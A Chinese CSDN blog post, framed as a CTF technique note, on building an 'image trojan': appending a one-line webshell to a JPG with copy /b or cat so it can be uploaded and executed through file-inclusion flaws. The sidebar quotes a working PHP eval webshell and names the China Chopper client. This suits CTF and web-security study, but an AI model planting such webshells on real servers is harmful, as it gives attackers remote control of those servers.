【CTF】图片马制作

最新推荐文章于 2024-07-28 22:23:00 发布
最新推荐文章于 2024-07-28 22:23:00 发布
阅读量9k 收藏 47
点赞数 3
分类专栏: CTF常用方法技巧 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/119247434
版权

简介

  • 木马病毒隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序
  • 原理:把一句话木马,通过二进制的方式追加到图片文件末尾,将木马文件和图片合并为另一个图片文件,合并后的图片包含一句话木马而且不影响图片显示,但用记事本等文本编辑器打开,能看到图片末尾的恶意代码。然后将图片上传到网站中,利用网站的漏洞,通常是文件包含漏洞,让网站把上传的图片当成脚本代码解析,从而达到运行恶意代码控制网站服务器的目的。
    简单来说就是以文件上传漏洞为基本条件,将可执行的条件写入图片中去,再利用文件包含漏洞来执行图片中存在的一句话木马,从而获取目标服务器的权限。

步骤

Windows

  • 第一步:找一个图片

  • 第二步:一句话木马文件
    在这里插入图片描述

  • 第三步:win+Rcmd,输入copy 图片文件名/b+一句话木马文件名/a 制作的图片马文件名

  • 第四步:记事本打开验证一句话木马是否写入成功
    注意点:图片文件和木马文件需放在一个路径下

eg:copy test1.jpg/b+test2.asp/a test3.jpg
在这里插入图片描述
用记事本打开验证一句话木马是否写入
在这里插入图片描述
ctrl+F查找一句话木马,写入成功

Linux

将木马文件追加到图片文件后面的方法:cat test1.asp >> test2.jpg
将两个文件合并成第三个文件的方法:cat test1.asp test2.jpg >> test3.jpg
在这里插入图片描述
查找一句话木马,写入成功
在这里插入图片描述

参考链接:这篇文章详细介绍了图片马上传过程及原理

练习:buuctf web [SUCTF 2019]CheckIn

吃_早餐
关注
  • 3
    点赞
  • 47
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
如何制作属于自己的图片
看不尽的尘埃——博客
11-19 6790
前言 图片是指代码写入后不破坏图片为前提,图片仍可正常打开。 详细过程 自定义一个新的文件夹,文件夹里放入三个文件。 一张自己喜欢的图片 自定义php代码文件 批处理文件  super.png  用文本编辑器打开也没php代码。  info.php 自定义php代码  yunxing.bat  然后双击...
linux/php一句话图片及实例
极光时流
09-24 1万+
Ubuntu一句话图片 准备一张图片tu.jpeg、phpinfo.php和hack.php; Phpinfo.php文件内容: hack.php文件内容: 准备一个16进制软件UE(UltraEdit),linux下载地址:https://www.cr173.com/soft/265552.html 以及装有hackbar的火狐; 中国菜刀,下载地址:https://down...
关于图片码的制作与使用
weixin_73180072的博客
11-02 786
第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助。本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,读者请勿用于其他用途,否则后果自负。本来是两个文件,执行命令后会生成一个新文件,新文件就是图片图片的使用前提是系统存在文件包含漏洞。
做一个图片图片)的四种方法 小白也能看会(详细步骤 ) 需要.htaccess等执行图片内代码
最新发布
qq_48368964的博客
07-28 1049
图片:就是在图片中隐藏一句话木。利用.htaccess等。
图片制作
hao2580的博客
05-13 7112
1.首先图片命名111.jpg 2.再新建222.asp文件,一句话木写入 3.然后win+R,cmd,cd到之前图片的目录路径下,命令为copy 111.jpg/b+222.asp/a 333.jpg 最后就会出现新的图片3333.jpg,就是制作出的图片
生成图片
2302_81133665的博客
05-20 554
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档windows系统和linux系统图片的生成@-windows系统-Linux系统。
图片制作
weixin_44791273的博客
10-04 503
找到一张比较小的图片,命名为1.jpg,如下图: 打开一个文本文档,输入:<?php @eval($_POST['123']);?> 直接将文件名改为1.php 在图片和木所在的文档打开cmd,输入:copy 1.jpg/b+1.php 2.jpg 2.jpg即为图片,用记事本打开,在一堆乱码的末尾可以看到我们的一句话木 ...
制作图片
课嗨教育的专栏
06-13 296
windows cmd - copy /b 1.jpg+1.php 666.jpg 内容按顺序合并,比如: linux
ctfshow web165 JPG二次渲染脚本(生成图片)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片)脚本
CTF内网渗透笔记
qq_26579613的博客
11-10 3942
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
备战CTF做题题解
weixin_40707492的博客
07-21 6526
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
CTFHub-WEB-文件上传
K_ShenH的博客
06-14 1488
CTFHub-WEB-文件上传
web安全-文件上传漏洞-图片制作-相关php函数讲解-upload靶场通关详细教学(3)
ran的博客
01-30 6405
getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。
CMD命令下图片生成命令
热门推荐
Key_book(句芒安全实验室)
06-07 1万+
非常简单,我们只需要一张图片1.jpg 一句话木写好的php文件 1.php 之后我们进入到命令行。 注意:将php文件和图片文件放到同一目录下,cmd也要跳转到放文件的目录下 之后执行命令 copy 1.jpg/b + 1.php/a 2.jpg 新生成的2.jpg就是我们制作好的图片了,之后我们就可以通过中国菜刀来进行连接了....
一句话图片制作
一个打渔的的博客K6uQ5H7^ff(R
03-01 308
一句话图片制作(建议找网站素材的图片): ·C32下做一句话 打开C32,把图片放在里面在图片末粘贴一句话保存 ·cmd下做一句话 copy/b 1.jpg+1.asp 2.jpg ·win7下右键图片,在属性->详细信->版权内插入一句话即可 ...
用bat制作图片——一句话木
AiENG_07的博客
11-29 1082
此命令关闭在控制台中回显命令,因此只有命令的输出可见,而不是命令本身。: 使用二进制拷贝将图像文件和 PHP 文件合并,并创建一个新的图像文件。使用 copy 命令将两个文件的内容合并,创建一个新的图像文件。: 提示用户将 PHP 文件拖放到窗口中,并按 Enter。: 提示用户确保图像文件和 PHP 文件位于相同的路径下。: 提示用户将图像文件拖放到窗口中,并按 Enter。提示用户输入图像文件和 PHP 文件的路径。: 用于接收用户输入的 PHP 文件路径。: 用于接收用户输入的图像文件路径。
制作图片:二次渲染(upload-labs第17关)
m0_72286569的博客
03-12 2264
在本关的代码中这个imagecreatefromjpeg();函数起到了将上传的图片打乱并重新组合。这就意味着在制作图片的时候要将木插入到图片没有被改变的部分。
ctf 图片隐写分析
04-14
CTF(Capture The Flag)是一种网络安全赛,其中包括各种类型的题目,包括密码学、网络安全、逆向工程等。图片隐写分析是CTF中的一类题目,主要涉及隐藏在图片中的秘密信息的提取和分析。 在图片隐写分析中,常见的技术包括LSB(Least Significant Bit)隐写和LSB匹配隐写。LSB隐写是将秘密信息嵌入到图片的最低有效位中,以保证对图片视觉上的影响最小。而LSB匹配隐写则是通过修改像素值的最低有效位来隐藏信息。 要进行图片隐写分析,可以使用一些工具和技术。常用的工具包括Steghide、Stegsolve、zsteg等。这些工具可以帮助你提取隐藏在图片中的秘密信息或者分析图片中的特殊特征。 此外,还可以使用一些图像处理技术来进行图片隐写分析。例如,可以使用图像处理库(如OpenCV)来检测图片中的特殊嵌入模式或者分析图片的颜色分布等。 总结一下,图片隐写分析是CTF竞赛中的一类题目,需要使用一些工具和技术来提取隐藏在图片中的秘密信息或者分析图片的特殊特征。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值